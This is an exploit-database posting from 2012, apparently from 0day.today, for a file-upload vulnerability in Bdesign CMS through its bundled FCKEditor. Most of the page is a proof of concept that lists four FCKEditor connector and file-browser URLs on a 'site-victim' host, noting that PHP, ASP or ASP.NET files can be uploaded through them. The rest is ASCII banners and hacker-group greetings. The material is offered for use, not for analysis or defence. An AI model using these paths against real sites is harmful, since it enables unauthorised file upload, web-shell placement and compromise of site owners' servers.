[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bdesign CMS (FCKEditor) File Upload Vulnerability

Author
DoSs-Dz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17980
Category
web applications
Date add
05-04-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  [»] Site            : 1337day.com                                     0
1  [»] Support e-mail  : submit[@]1337day.com                            1
0                                                                        0
1               +---------------------------------------+                1
0               |I'm DoSs-Dz Member From Inj3ct0r Team  |                1
1               +---------------------------------------+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+----------------------------------------------------------------------------+
# Exploit Title : Bdesign CMS (FCKEditor)  File Upload
# Date :  05 April 2012
# Vendor Site :http://www.dotnetcmsportal.com/DownloadHandler.ashx?pg=73eae689-84b6-45d2-8d63-8fcf0996a60a&section=d35e34d0-fe93-4f45-b283-f4333ab6968d&file=Bdesign.rar
# Tested On : windows 7 professional
# Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] Upload Exploit P0C =» 
   
   ------------------------------------------------------------------------------------
   First poc is :
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/uploadtest.html    ---- > Uploaded File URL: your file link
   can you up php form or asp or asp.net
   ------------------------------------------------------------------------------------
   Second poc is : 
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/test.html  ---- > Uploaded File URL: your file link
   can you up php form or asp or asp.net
   ------------------------------------------------------------------------------------
   therd poc is :  
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/browser.html   ---- > see it
   ------------------------------------------------------------------------------------ 
   four poc is : 
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/frmupload.html   ---- > see it
   -------------------------------------------------------------------------------------- 
+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]       |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gheurrara on : 05 april 2012     |
+------------------------------------+ 



#  0day.today [2024-12-24]  #